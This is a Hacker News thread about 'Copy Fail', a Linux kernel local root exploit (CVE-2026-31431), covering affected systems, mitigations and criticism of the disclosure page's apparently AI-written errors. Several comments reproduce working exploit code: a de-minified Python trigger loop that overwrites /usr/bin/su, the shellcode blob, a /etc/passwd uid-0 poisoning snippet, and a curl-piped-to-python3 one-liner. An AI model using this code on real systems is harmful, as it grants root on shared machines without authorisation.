As soon as I read this<p>>Shared dev boxes, shell-as-a-service, jump hosts, build servers — anywhere multiple users share a kernel. any user becomes root<p>jumped out of bed and went straight into webminal.org servers as local user and ran the python code. It says permission denied on sock() call.<p>Then I tested with local laptop with it:<p>```<p>$ uname -a<p>Linux debian 6.12.43+deb12-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.12.43-1~bpo12+1 (2025-09-06) x86_64 GNU/Linux<p>$ python3 copy_fail_exp.py<p># cd /root && ls<p>bluetooth_fix_log.txt dead.letter overcommit_memorx~ overcommit_memory~ overcommit_memorz~ resize.txt snap<p>```<p>It does provide the root access!
Beware that running this kind of thing even as a test on a host you don't own may well be a criminal offense!
Everything MAY be a criminal offense. Whether it has any merit is another matter.<p>If I were accused of anything criminal for running this in a host, my defense would be that I was checking the safety of a service I was being offered. If the service was vulnerable, I would counterclaim, if you are on the defense you are already losing.
Could be worse (we'll see) as this could be a wild ride along with react2shell or some of the compromised packages as of late.
Anyone tried in an Azure Cloud Shell?<p>Asking for a friend ;)<p>EDIT: Don't. "/s" in case not obvious.
I also tested this on an Ubuntu 24.04 (x86_64) host w/ GA kernel ("6.8.0-103-generic #103-Ubuntu SMP PREEMPT_DYNAMIC Tue Feb 10 13:34:59 UTC 2026 x86_64 GNU/Linux") and wasn't able to reproduce the "problem", although `canonical-livepatch` tells me that there are currently "no livepatches available".
Is there a readable version of the exploit readily available by any chance? Gotta admit that I failed binary-zip-interpretation-with-naked-eye class twice
Go version came in handy <a href="https://github.com/badsectorlabs/copyfail-go" rel="nofollow">https://github.com/badsectorlabs/copyfail-go</a> especially for systems without the very latest python (os.slice)<p>Slightly more readable Python version at <a href="https://gist.github.com/grenkoca/b82281a4706e936072979acf54b608df" rel="nofollow">https://gist.github.com/grenkoca/b82281a4706e936072979acf54b...</a>
The binary "zip" isn't the exploit, it's the shellcode. The exploit is the rest, which changes the code of a SUID executable (su).
I have a C translation here that should be pretty readable <a href="https://github.com/tgies/copy-fail-c" rel="nofollow">https://github.com/tgies/copy-fail-c</a>
The call to zlib basically overwrites a minimal ELF into a portion of the `su` binary, which exceve's /bin/sh.
To be specific, the zlib'd binary basically does this (except that it directly uses Linux syscalls to do so rather then C wrappers):<p><pre><code> setuid(0);
execve("/bin/sh", NULL, NULL);
exit(0);</code></pre>
Interestingly it fails for me because my `su` isn't world-readable:<p><pre><code> $ stat /bin/su
File: /bin/su
Size: 59552 Blocks: 118 IO Block: 59904 regular file
Device: 0,52 Inode: 796854 Links: 1
Access: (4711/-rws--x--x) Uid: ( 0/ root) Gid: ( 0/ root)
Access: 2023-09-18 13:23:03.117105665 -0500
Modify: 2021-02-13 05:15:56.000000000 -0600
Change: 2023-09-18 13:23:03.119105665 -0500
Birth: 2023-09-18 13:23:03.117105665 -0500
</code></pre>
I'm not sure I have any setuid/setgid binaries that are world-readable...
A workaround might be to make all setuid/setgid files non-world-readable because then they cannot be opened at all, and thus there is no setuid file to replace the contents of.
Eh, if you can pollute page caches this won’t safe you.<p>Think modifying shared libraries, ld preload, cron, I guess on some systems /etc/passwd even.<p>There are a lot of files readable that should definitely not be writable.
Fair enough -- a simpler change might be to poison /etc/passwd and call `su` to a user that has uid 0, since that requires no shell code nor a readable binary, and this seems to have worked in a slightly modified POC:<p><pre><code> f=g.open("/etc/passwd",0);
e="rkeene:x:0:0:System administrator:/root:/run/current-system/sw/bin/bash\n".encode()
...
g.system("/run/wrappers/bin/su - rkeene")</code></pre>
It being readable is the default configuration most places, after all the purpose is to call it from a non-privileged user. But I could see it being made non-readable since its use is discouraged nowadays... though then I'd expect sudo to be readable as an alternative.
For this crowd, I highly suggest checking out the technical writeup<p><a href="https://xint.io/blog/copy-fail-linux-distributions" rel="nofollow">https://xint.io/blog/copy-fail-linux-distributions</a>
This looks like an extraordinary find at first glance.<p>Does this mean you can go from a basic web shell from a shared hosting account to root? I can see how that could wreak havoc really quickly.
That’s the most AI-written page ever made
I've (well, mostly Claude did) created a module that unloads the active AF_ALG (builtin) module and mitigates the exploit without having to reboot.<p>Tested on almalinux8/9<p><a href="https://gist.github.com/42wim/2e3cc3c92333e4c2730541e6f0e03862" rel="nofollow">https://gist.github.com/42wim/2e3cc3c92333e4c2730541e6f0e038...</a><p>YMMV
What is "RHEL 14.3"? Was this site a one shot prompt. Quality.
I couldn't get the POC to work with my version of Python so I had ChatGPT convert it to C [0] and was able to verify my Slackware system does not appear to be affected, but my NixOS system would be if I had any world-readable suid binaries (which I had to make one to test it).<p>[0] <a href="https://rkeene.org/viewer/tmp/copy_fail_exp.c.htm" rel="nofollow">https://rkeene.org/viewer/tmp/copy_fail_exp.c.htm</a>
If this is verified, this is a very big deal. Root access on any shared computer. Additionally do we know what kernel versions and stable versions have the patch?
I just tested on my home server running ubuntu 24.04 LTS with newest kernel from repositories, got root.
As far as mainline goes, only 7.0 and up have the patch already.
Debian page: <a href="https://security-tracker.debian.org/tracker/CVE-2026-31431" rel="nofollow">https://security-tracker.debian.org/tracker/CVE-2026-31431</a>
Oddly, the POC doesn't work on my Debian 12 (Bookworm) EC2 instance. Everything that should indicate it's vulnerable is there, including the ability to socket(38,5,0).bind("aead", "authencesn(hmac(sha256),cbc(aes))")
This is amazing. Page says it works on RHEL 14.3, which doesn’t exist. Current RHEL is 10.x, this must’ve been done in a TARDIS.
14.3 seems to come from some Red Hat-specific GCC version, which can be reported as "gcc (GCC) 14.3.1 20250617 (Red Hat 14.3.1-2)". See these random examples I found by googling:<p><a href="https://github.com/anthropics/claude-code/issues/40741" rel="nofollow">https://github.com/anthropics/claude-code/issues/40741</a> (gcc version "Red Hat 14.3" included in system version at the bottom)<p><a href="https://docs.oracle.com/en/database/oracle/tuxedo/22/otxig/software-requirements-red-hat-enterprise-linux-10-64-bit.html" rel="nofollow">https://docs.oracle.com/en/database/oracle/tuxedo/22/otxig/s...</a>
On the same line it says kernel version 6.12.0-124.45.1.el10_1. Which is RHEL 10. This is the kind of typo that humans make -- the hard to type numbers are accurate because they're cut and pasted, but the "easy" numbers have errors because they're not cut and pasted.
ugh sorry should be fixed. There was some scrambling to get more info together to explain the issue (and yes, obviously marketing), so there are some minor mistakes. Thanks for pointing it out!
Hope the 'marketing' had the desired effect. This entire article of pure AI noise was an absolute slog to get through to get to useful information. I have no idea how you view that as positive advertising.
> obviously marketing<p>Why marketing though?
because we're a company and we want to make money to continue to fund cool research, and help our customers secure their software :)
I don't quibble with your wanting to make money, but you also need to invest some resources on fact-checking, proofreading, and editing your work. You can hire technical writers and marketing copy editors on an hourly basis as needed. LLMs aren't good enough yet to produce high-quality output on their own; and the results tend to read similarly, loaded with clichés and identical turns of phrase.<p>(You're not alone in this, BTW; I don't mean to single you out.)
Resume-driven development
yeah, I assumed the whole thing was AI slop when I saw EL14...
<a href="https://x.com/i/status/2049687923814281351" rel="nofollow">https://x.com/i/status/2049687923814281351</a><p>> and yes, RHEL 14.3 doesn't exist We meant to say RHEL 10.1. Sorry for the confusion!
[flagged]
<p><pre><code> curl https://copy.fail/exp | python3 && su
Traceback (most recent call last):
File "<stdin>", line 9, in <module>
File "<stdin>", line 5, in c
AttributeError: module 'os' has no attribute 'splice'
</code></pre>
Does this mean I'm not affected or it's a buggy script?<p>Edit: python3 is python 3.6 on my system. Runnung with python3.10 instantly roots. Crazy find!
It is trivial to re-write splice, just because the PoC uses it does not mean you're "not affected".
What is your Python version? Splice was added in 3.10.<p><a href="https://docs.python.org/3/library/os.html#os.splice" rel="nofollow">https://docs.python.org/3/library/os.html#os.splice</a>
Could this be used to root Android devices? Does Android ship with algif_aead?
I rewrote it quickly to C [1] (and changed the embedded binary to be aarch64).<p>Unfortunately it fails on calling bind() on my device, so probalby Android doesn't ship with that kenrel module by default :(. So no freedom for my $40 phone.<p>Putting it out here, maybe somebody else will have better luck.<p>[1] <a href="https://gist.github.com/alufers/921cd6c4b606c5014d6cc61eefb080fe" rel="nofollow">https://gist.github.com/alufers/921cd6c4b606c5014d6cc61eefb0...</a>
I’ve poked around on my phone and it didn’t work:<p><pre><code> File "/data/data/com.termux/files/home/a.py", line 5, in c
a=s.socket(38,5,0); # ...
File "/data/data/com.termux/files/usr/lib/python3.13/socket.py", line 233, in __init__
_socket.socket.__init__(self, family, type, proto, fileno)
~~~~~~~~~~~~~~~~~~~~~~~^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
PermissionError: [Errno 13] Permission denied</code></pre>
I got line 5 to run and failed on line 8 due to lack of su. I'd need to find a user accessible setuid binary for it to work.<p>Traceback (most recent call last):
File "/data/data/com.termux/files/home/exploit.py", line 8, in <module>
f=g.open("/usr/bin/su",0);i=0;e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))
^^^^^^^^^^^^^^^^^^^^^^^
FileNotFoundError: [Errno 2] No such file or directory: '/usr/bin/su'
There’s SELinux, everything is mounted nosuid, barely anything runs as root except init. I doubt it.
Android is smarter than setuid + system partitions aren't writable.
System partitions being non-writable has nothing to do with the vulnerability - it allows modifying the cache of any file that you can open for reading.<p>Not using setuid anywhere means you'd have to build a slightly more clever exploit, but it's still trivial - just modify some binary you know will run as root "soon".<p>But... I didn't check, but IIRC the untrusted_app secontext that apps run in is not allowed to open AF_ALG sockets - so you can't directly trigger the vulnerability as a malicious app. Although it might be possible in some roundabout way (requesting some more privileged crypto service to do so).
Edit: Ignore this I overlooked calling order. It is indeed blocked<p>~~My allegedly fully patched pixel 8 pro allowed an AF_ALG socket to open under termux without virtualization so I'm not sure the last but is true~~
Ah, I blindly assumed such memory would be mapped readonly...
Its not writing to the partition though is it? It is polluting the cache page via a write with a buffer overrun in the kernel. I don't think buffer overruns follow permissions.
Tried this on my arch VPS which has a few users that hasn't been rebooted for 122 days.<p>Got:<p><pre><code> OSError: [Errno 97] Address family not supported by protocol
</code></pre>
I guess AF_ALG is not part of the Arch Linux LTS kernel?<p>Edit:<p>Looks like on Arch you have to go out of your way to have this enabled.<p><pre><code> $ zcat /proc/config.gz | grep CONFIG_CRYPTO_USER_API
CONFIG_CRYPTO_USER_API=m
CONFIG_CRYPTO_USER_API_HASH=m
CONFIG_CRYPTO_USER_API_SKCIPHER=m
CONFIG_CRYPTO_USER_API_RNG=m
# CONFIG_CRYPTO_USER_API_RNG_CAVP is not set
CONFIG_CRYPTO_USER_API_AEAD=m
# CONFIG_CRYPTO_USER_API_ENABLE_OBSOLETE is not set
$ uname -r
6.12.63-1-lts</code></pre>
The Python dependency is easily eliminated, and the x86_64 payload made cross-platform: <a href="https://github.com/tgies/copy-fail-c" rel="nofollow">https://github.com/tgies/copy-fail-c</a>
The fetishism of "byte count" (here, as "732 byte python script") needs to stop, especially when in a context like this where they're trying to illustrate a real failure modality.<p>Looking at their source code [1] it starts with this simple line:<p>import os as g,zlib,socket as s<p>And already I'm perplexed. "os as g"? but we're not aliasing "zlib as z"? Clearly this is auto-generated by some kind of minimizer? Likely because zlib is called only once, and os multiple times. As a code author/reviewer, I would never write "os as g" and I would absolutely never approve review of any code that used this.<p>Anyway, I could go on. :) Let's just stop fetishizing byte count<p>[1] <a href="https://github.com/theori-io/copy-fail-CVE-2026-31431/blob/main/copy_fail_exp.py" rel="nofollow">https://github.com/theori-io/copy-fail-CVE-2026-31431/blob/m...</a>
Hilariously, "os as g" adds one more byte than it saves, since os is only used 4 times but the alias takes 5 extra bytes to save 4. And "socket as s" comes out even.<p>If you wanted real savings, you'd use "d=bytes.fromhex" instead of defining a function -- 17 bytes!! And d('00') -> b'\0' for -2 bytes.<p>We could easily get the byte count down further by using base64.b85decode instead of bytes.fromhex (-70 or so), but ultimately we're optimizing a meaningless metric, as you mention.
I don't get the 732-byte thing either and while I think it's a relatively punchy and unusually informative landing page for named vulnerability there are little snags like this all over it.<p>But the fact that it's not a kernel-exec LPE and it's reliable across kernels and distributions is important; it's close to the maximum "exploitability" you're going to see with an LPE. Which the page does communicate effectively; it just gilds the lily.
yeah... definitely a bit of a rush to get the landing page out after a long time in the disclosure process. The folks putting this all together have been working like mad (finding the bug, disclosing, working a lot on patching, writing up POCs and verifying exploitability in different scenarios) and stayed up really late to finish up the landing page, which led to a lot of minor issues.<p>But the bug is real and people should patch :)<p>For the size: sometimes people will shove in kilobytes of offset tables or something into an exploit, so it'll fingerprint and then look up details to work. This is much smaller because it doesn't need any of that, which is important for severity. (I agree the "golf" nature is a bit of an aside, kind of like pwn2own exploits taking "10 seconds")
I don't see it as fetishizing byte count. I think of it as a proxy measure for how complicated or uncomplicated the exploit might be. They could just as well have said "we can do it in 3 lines of python" or "the Shannon entropy of the script implementing the exploit is really small" and I would have interpreted it similarly.<p>Where do you see this "fetishizing" happening most often? It's a strange thing to counter-fetishize about.
> I think of it as a proxy measure for how complicated or uncomplicated the exploit might be.<p>From a Busy Beaver, 256-bytes compo, or Dwitter perspective, 732 bytes isn’t really that meaningful.<p>And the sample exploit is even optimizing the byte size by using zlib compression, which doesn’t make much sense for the purpose. It just emphasizes the byte count fetishization.
Again, I think the point is that compressed size is a reasonable measure of the inherent complexity of a program. I'm a crap mathematician, but I believe that is a fundamental concept in information theory.
Glad I’m not alone. The whiplash from “oh, python I can read this” to “what the hell does that do” was jarring.<p>Assuming AI was correct, it unpacks more or less like this<p>import os, zlib, socket<p>AF_ALG = 38<p>SOCK_SEQPACKET = 5<p>SOL_ALG = 279<p>def hex_bytes(x):<p><pre><code> return bytes.fromhex(x)
</code></pre>
def trigger(fd, offset, patch4):<p><pre><code> sock = socket.socket(AF_ALG, SOCK_SEQPACKET, 0)
sock.bind(("aead", "authencesn(hmac(sha256),cbc(aes))"))
sock.setsockopt(SOL_ALG, 1, hex_bytes("0800010000000010" + "0" * 64))
sock.setsockopt(SOL_ALG, 5, None, 4)
op, _ = sock.accept()
length = offset + 4
zero = b"\x00"
op.sendmsg(
[b"A" * 4 + patch4],
[
(SOL_ALG, 3, zero * 4),
(SOL_ALG, 2, b"\x10" + zero * 19),
(SOL_ALG, 4, b"\x08" + zero * 3),
],
32768,
)
read_pipe, write_pipe = os.pipe()
os.splice(fd, write_pipe, length, offset_src=0)
os.splice(read_pipe, op.fileno(), length)
try:
op.recv(8 + offset)
except:
pass
</code></pre>
target = os.open("/usr/bin/su", os.O_RDONLY)<p>payload = zlib.decompress(bytes.fromhex("..."))<p>offset = 0<p>while offset < len(payload):<p><pre><code> trigger(target, offset, payload[offset:offset + 4])
offset += 4
</code></pre>
os.system("su")
llms <i>love</i> that though<p>"The honest solution: a clean 50-line cut" and so on, ad nauseam
I started to take the exploit script apart and reformat it to be something readable. At about 1041 bytes it's actually readable. The heart of it also includes an encoded zlib compressed blob that's 180 bytes long ('78daab77...'). This is decompressed (zlib.decompress(d(BLOB)) to a 160 byte ELF header.
> I would absolutely never approve review of any code that used this.<p>How often do you review, and subsequently block the release, of PoCs in this sort of context? Sounds like you've faced this a lot.<p>I always thought code quality mattered less in those, as long as you communicate the intent.
If you have a choice between posting minimized exploit code, and posting regular exploit code, posting minimized code is virtually always the wrong choice.<p>If you have a choice between pointing out the byte size of the exploit, and not pointing out the byte size of the exploit, pointing it out is virtually always the wrong choice.<p>In both cases, doing the right thing is <i>less work</i>. So somebody is going the extra way to ensure they are doing it wrong. If they didn't care, they'd end up doing it right by default.
> as long as you communicate the intent<p>How does "import os as g" communicate the intent? How does hiding the payload behind zlib communicate the intent? This is the opposite: obfuscating the intent, so they can brag about 732 bytes instead of 846 bytes (or whatever it might have been).<p>It would have been less work for everyone involved to just release the unminified source.
While not formally reviewing code like this, I read a lot of it for fun. When it's clear and understandable, it's more educational and enjoyable. If the PoC code can also serve as a means of communication, that seems like an extra win.
While I agree that it doesn't make much sense to use a minimizer on code the reader could understand, the code-golfed byte count of a CVE repro communicates its complexity in a certain visceral way.
It's just lazy AI* writing w/0 editing.<p>"Just" is doing a lot of work there, I'm so annoyed reading it.<p>It's like an anti-ad and they had pretty cool material to work with.<p>* Claude loves stacatto "Some numeric figure. Something else. Intensifier" (ex. the "exploitable for a decade." or whatever sentences)
Completely without editing, to the point of hallucinating a RHEL version (14.3) that doesn't exist.
I recommend reading the technical writeup
<a href="https://xint.io/blog/copy-fail-linux-distributions" rel="nofollow">https://xint.io/blog/copy-fail-linux-distributions</a>
This is pretty legible compared to the 90s C rootshell.org exploits.
> Anyway, I could go on.<p>Then go on. zlib is only used once, so "zlib as z" in exchange for using z once doesn't get you anything. Using os directly and not renaming it g saves you 2 bytes though. But in this age where AI outputs reams of code at the drop of a hat, why shouldn't we enjoy how small you can get it to pop a root shell?<p><a href="https://gist.github.com/fragmede/4fb38fb822359b8f5914127c2fe1c94f" rel="nofollow">https://gist.github.com/fragmede/4fb38fb822359b8f5914127c2fe...</a><p>edit: If we drop offset_src=0 and just pass in 0 positionally, it comes down to 720.
><i>As a code author/reviewer, I would never write "os as g" and I would absolutely never approve review of any code that used this.</i><p>lucky for them, its an exploit script, not enterprise code.<p>all that needs to be "reviewed" is whether or not it exploits the thing its supposed to.<p>edit: yall really think a 10-line proof of concept script needs to undergo a code review? wild. i shouldnt be surprised that the top comment on a cool LPE exploit is complaining about variable naming
It's just sloppy. Readers are human, and little mistakes like this take away from the article. Then you add a nonexistent RHEL version, and it just isn't a good look. Which is a shame, because it's otherwise a very interesting vuln.<p>Maybe you didn't care, but the length of this comment chain clearly shows that it matters. Effective communication is just as important as the engineering.
agreed regarding the RHEL version!<p>i just dont understand huffing and puffing over <i>"os as g"</i> in a 10-line poc script, and saying <i>"well i would never approve this"</i>. its not enterprise code. its not code that will ever be used anywhere else, for anything. its sole purpose is to prove that the exploit is real, which it does!<p>the rest of the information is in the actual vulnerability report. the poc is a courtesy to the reportee, so that they can confirm that the report itself isnt bullshit.<p>evidently, given the downvotes i am getting, people think exploit scripts should be enterprise quality code. ¯\_(ツ)_/¯ half of the reports i see flowing through mailing lists dont even have a poc.<p>amazingly HN-like to be upset about a variable name
Disagree because to run the PoC you really ought to understand what it’s doing.<p>And this code is not readable at all. It is failing at letting people confirm the exploit easily.
><i>Disagree because to run the PoC you really ought to understand what it’s doing.</i><p>that is contained in the report, which will look similar to the blog. the maintainers will have an open line of contact with the reporters as well. the poc is a small part of the entire report. its not like the linux maintainers <i>only</i> received this poc and have to work out the vulnerability from it alone.<p>><i>It is failing at letting people confirm the exploit easily.</i><p>it confirms the exploit incredibly easy. just run it, and you get confirmation.
I don't anyone is saying it's not "enterprise" it's just that they clearly went out of their way to make it less readable. By all means advertise the golf'd line count but just have the non minified script.
I'd imagine that at minimum, the team in charge of patching the vulnerability would need to review how the exploit works.
What is the rationale behind naming
CVEs and individual domains? Marketing?
It's an advertisement for their tool that found the exploit: <a href="https://copy.fail/#contact" rel="nofollow">https://copy.fail/#contact</a>, <a href="https://xint.io/products/xint-code" rel="nofollow">https://xint.io/products/xint-code</a>
can you remember what CVE-2021-44228 is without looking it up? CVE-2014-6271? CVE-2017-5753?<p>i bet if i told you their names, you would instantly know what vulns those are.<p>its easier to talk about things with names. it hurts no one. it takes approximately no effort or time.<p>CVEs are, for whatever reason, like the only thing on the planet that people seem to have a problem with when they receive a name. i am not sure why.
> CVEs are, for whatever reason, like the only thing on the planet that people seem to have a problem with when they receive a name. i am not sure why.<p>What, you guys talk about books based on their “title” instead of just memorising the ISBN of each book? Pssh, count me disappointed!
For anyone else that was curious they're log4j, shellshock, and spectre
The AI generated prose screams marketing. Marketing is why there's a "Contact our Security Team" form at the bottom of the page.
It's certainly marketing, but it's prosocial: there's no scarcity of names, and "copy.fail" is much easier to remember and talk about than "CVE-2026-31431".
Probably to some extent it is marketing, but generally it has to do with significant bug finds to get the message out to the people who need to apply patches and/or be informed. Heartbleed, Log4Shell, etc.<p>Very few CVE’s get names dedicated to them like this, because usually when they do - it is very serious, as in this case.
Giving catchy names for bad exploits has been a thing for a while. Probably to make sure it's easy to reference and make sure you're patches as opposed to passing numbers around. Heartbleed, Shellshock, BEAST, Goto Fail, etc
Yes, originally it was to help spread awareness. Now it has become more of a gimmick I would say
It makes sure people don't forget about the vulnerabilities, at least
Same reason they name storms, numbers scare normies
Anyone have any idea when Bottlerocket will acknowledge CVE? Seems like a critical for kubernetes nodes......<p><a href="https://github.com/bottlerocket-os/bottlerocket/security/advisories" rel="nofollow">https://github.com/bottlerocket-os/bottlerocket/security/adv...</a>
> Any setuid-root binary readable by the user works.<p>Interesting detail. On Alpine, `/usr/bin/su` is not readable by any user, so the PoC doesn't work.<p>I suspect that the underlying issue can be exploited in other ways, but it makes me think that there's no reason for <i>any</i> suid binary to be world-readable.
For agents, if you are concerned about that, block access to "su" as it is interactive anyway. Not loading it into the memory will block the attack. If you are using AgentSH (<a href="https://www.agentsh.org" rel="nofollow">https://www.agentsh.org</a>) you can add a rule to block "su" and soon be able to block AF_ALG sockets if you want to further protect things.
Does this affect my Hetzner VPSs running Ubuntu probably? Or Nebius H200 VMs?<p>They are probably Ubuntu 24 but don't remember.
Quickly dove into this.<p>1. Yes, it's real.<p>2. Current chain can write any arbitrary content to any user-readable file (into the page cache).<p>3. Current chain relies on an available target suid binary that you can open() as a lowpriv user.<p>4. Current exploit relies on that binary being /bin/su and then being able to execve(/bin/sh, 0, 0) (which doesn't work on alpine, etc.). The former is easily replaced in the code. The latter needs a rebuilt payload ELF (also easy).<p>5. The authors say they have other chains (including ones that allow container escapes). I believe them.<p>6. A mildly de-minified PoC for Alpine with a new payload ELF is at hackerspace[pl]/~q3k/alpine.py . You'll need /bin/ping from iputils. This should be now somewhat reliable on any distro that has a `/bin/sh` and any setuid-and-readable binary (you'll just need to find it on your own).
And yeah, you can just change arbitrary instructions of any running process (including privileged) as long as you have read access to that process' binary:<p><a href="https://object.ceph-waw3.hswaw.net/mastodon-prod/media_attachments/files/116/490/539/301/682/066/original/0e25f6b7b79cf80f.png" rel="nofollow">https://object.ceph-waw3.hswaw.net/mastodon-prod/media_attac...</a>
holy smokes it just rooted my just installed from ISO Ubuntu server
Better explanation of the write up (still from original exploit author) : <a href="https://xint.io/blog/copy-fail-linux-distributions" rel="nofollow">https://xint.io/blog/copy-fail-linux-distributions</a>
I wonder if this is a problem for very old honeypods like the one on turris omnia, sold many years ago.
Docker wasn't a thing these days and everything was done with lcx containers, if at all.
Looks like a LLM hallucination - there is no thing like "RHEL 14.3", although referenced kernel signature (6.12.0-124.45.1.el10_1) contains reference to real RHEL release, i.e. 10.1.
It looks like this is legit, but the script is very phishy and I wouldn't run it in unvirtualized or disposable systems.<p><a href="https://github.com/theori-io/copy-fail-CVE-2026-31431/blob/main/copy_fail_exp.py" rel="nofollow">https://github.com/theori-io/copy-fail-CVE-2026-31431/blob/m...</a><p>>zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))<p>This is not source code, this is binary, it's entirely possible that this contains a script that downloads another malicious script (or that simply contains the malicious commands)<p>That said, I understand why a terser script might have been prioritized.<p>EDIT: There's a couple of C ports in the comments that contain more details and no compressed payloads.
> This is not source code, this is binary, it's entirely possible that this contains a script that downloads another malicious script (or that simply contains the malicious commands)<p>It doesn't, it's just a compressed ELF file that does setuid(0); execve(/bin/sh, 0, 0). You can just unzlib it and throw it in a disassembler.
I checked it. Very nice efforts made to create it
On the downside, I need to push new kernels to all my servers.<p>On this bright side, does this mean Magisk is coming to all unpatched Android phones?
s6-overlay is a popular container image base for many self hosted services, and it uses an suid binary for startup. I wonder if this could be used to escape the container?
So this could be usable in lot of places with Python and Linux running? Not that I have too many Linux devices around. Still, might be handy sometimes on personal devices.
This can likely be shipped as binary code without dependencies like python, as the bug is in the kernel.
There's nothing specific about this related to Python, that's just demonstrating how it works.<p>This is usable anywhere on an affected Kernel version
Works on all my servers. This is terrifying.
Wow. I tried it on an old testing VM of Ubuntu 24.04 that had not been touched for a few months. Instant root with the bonus that any user that runs "su" gets root too.
I updated the VM thinking it would be fixed afterward. Nope.
Can we just make a one-pager instead of this nonsense LLM bullet pointed list that is explaining this issue to your pointy-haired CEO instead of to sysadmins who understand the badness in 3 lines? Yeesh
Fun day for people running bare metal GPU nodes, where teams have been training models for months, and now it must be abruptly aborted to apply security patches... is that something that can be resumed, or do they have to restart from scratch?
As usual, Qubes is not vulnerable, since by its design, any untrusted software runs in dedicated VMs with hardware virtualization.<p>Meanwhile, recent Xen CVEs also do not affect Qubes, as usual, <a href="https://www.qubes-os.org/news/2026/04/28/xsas-released-on-2026-04-28/" rel="nofollow">https://www.qubes-os.org/news/2026/04/28/xsas-released-on-20...</a>
You know that Xen is just a hypervisor right? Dom0 (the admin Qube) is running the Linux kernel and is vulnerable like any other Linux system. DomU (App Qubes) also run the Linux kernel and are just as vulnerable.<p>You can check your DomU kernels using this guide:<p><a href="https://doc.qubes-os.org/en/latest/user/advanced-topics/managing-vm-kernels.html" rel="nofollow">https://doc.qubes-os.org/en/latest/user/advanced-topics/mana...</a><p>If your Dom0 or DomU is running kernel < 6.18.22, or between 6.19.0 and 16.19.12 you are vulnerable.<p><a href="https://github.com/QubesOS/qubes-linux-kernel/pull/1272" rel="nofollow">https://github.com/QubesOS/qubes-linux-kernel/pull/1272</a> commit fafe0fa2995a of the kernel mirror<p>Currently stable version of QubeOS does not have the patched kernels. <a href="https://yum.qubes-os.org/r4.3/current/dom0/fc41/rpm/" rel="nofollow">https://yum.qubes-os.org/r4.3/current/dom0/fc41/rpm/</a>
> Dom0 (the admin Qube) is running the Linux kernel and is vulnerable<p>Yes, it is vulnerable, except there is no attack vector, as you don't run any software there: <a href="https://doc.qubes-os.org/en/r4.3/user/downloading-installing-upgrading/supported-releases.html#note-on-dom0-and-eol" rel="nofollow">https://doc.qubes-os.org/en/r4.3/user/downloading-installing...</a><p>> DomU (App Qubes) also run the Linux kernel and are just as vulnerable.<p>I think you misinterpret the Qubes approach to security. If you do everything in one VM, you get no protection from the virtualization. Moreover, there is no sudo password by design: <a href="https://doc.qubes-os.org/en/r4.3/user/security-in-qubes/vm-sudo.html" rel="nofollow">https://doc.qubes-os.org/en/r4.3/user/security-in-qubes/vm-s...</a> This is not how to use Qubes.<p>You need to compartmentalize your workflows. It doesn't matter if my disposable VM is compromised. My secrets are in another, offline VM, where I never run anything. There is no way to use the discussed vulnerability, if one uses Qubes according to docs. See examples here: <a href="https://doc.qubes-os.org/en/latest/user/how-to-guides/how-to-organize-your-qubes.html" rel="nofollow">https://doc.qubes-os.org/en/latest/user/how-to-guides/how-to...</a>
I tried this on NixOS, but it doesn't seem to be easily reproducible. There's no /usr/bin/su - okay, fine: I changed it to /run/wrappers/bin/su, but that didn't work, and I <i>think</i> the reason why is because the NixOS suid wrappers have +x but not +r:<p><pre><code> $ ls -lah /run/wrappers/bin/su
-r-s--x--x 1 root root 70K Apr 27 11:09 /run/wrappers/bin/su
</code></pre>
Not that this makes the underlying mechanism of the exploit any better, but I wonder what else you can do with it. Is there a way to target a suid binary that doesn't have +r? I guess all of the suid binaries necessarily don't, since the wrapper system doesn't grant it and you can't have suid binaries in the /nix/store.<p>I know it's also unrelated, but this is the most aggressively obvious LLM slop copy I've ever seen and it is a page with like 30 sentences. I guess we're just seriously doing this, huh?
It's the same with Gentoo, setuid binaries are installed without read permission.<p>But modifying a setuid binary is just the demo exploit that was published with the vulnerability disclosure. The vulnerability actually allows modifying four bytes in any readable file. That means system configuration files, other binaries intended to be run by root, libraries... It's not limited to modifying setuid binaries.
Are kernel crypto modules even loaded by default on enterprise distros
I love how it says
"Standalone PoC. Python 3.10+ stdlib only (os, socket, zlib).
Targets /usr/bin/su by default; pass another setuid binary as argv[1]."<p>Except you can't pass another setuid binary as argv[1] because the AI writing this slop never added that feature to this python script.<p>I can't get it to work on any distro i've tried.
> Will you release the full PoC?<p>> Yes — it's on this page. We held it for a month while distros prepared patches; the major builds are out as of this writing.<p>There is no update available for Ubuntu 24, PoC works and just tried updating.
RHEL is listing this as fix deferred for RHEL 8 and 9.
I tried this exploit on Android and it looks like you need root in the first place to create an AF_ALG socket. I guess it is an SELinux policy to disable AF_ALG entirely.
Despite the copy/images being weird about RHEL 14.3, this seems to work. Wow?
SUID binaries once again assisted a local privilege escalation attack. This is a major problem that distros can't keep ignoring.
Use extreme caution running arbitrary code on your machines, especially obfuscated code that tickles kernel bugs! (edited)
Analysis of the POC concurs with my tests that confirm that the portion of `su` that gets overwritten does not survive a reboot.
The page explicitly describes that it is stealthy as it does not make permanent changes, only corrupting the binary in memory.
> If your kernel was built between 2017 and the patch<p>This is why I compile my own kernel. I disable things I don't use. If it's not present it can't hurt you.<p>> block AF_ALG socket creation via seccomp regardless of patch state.<p>Likewise I use seccomp to only allow syscalls that are necessary. Everything else is disabled. In the programs I have that need to connect to a backend socket, that is done, and then socket creation is disabled.
Any pointers on how to set that up? Like, run all the things through strace, cut the first field, sort, uniq, run through some template and something somesuch what how?
You can tell security has become complete theatre when people are registering domains and setting up a whole fucking website for individual ones.
Is this fixed in any stable release kernel yet?
Does anyone have a workaround for it? Edit: I don't understand why the comment would be downvoted.
I used, for debian based systems:<p><pre><code> printf "# CVE-2026-31431\nblacklist algif_aead\ninstall algif_aead /bin/false\n" | sudo tee /etc/modprobe.d/blacklist-algif_aead.conf >/dev/null && sudo update-initramfs -u</code></pre>
There's some workarounds in <a href="https://copy.fail/#mitigation" rel="nofollow">https://copy.fail/#mitigation</a>
[dead]
[dead]
[dead]
[flagged]
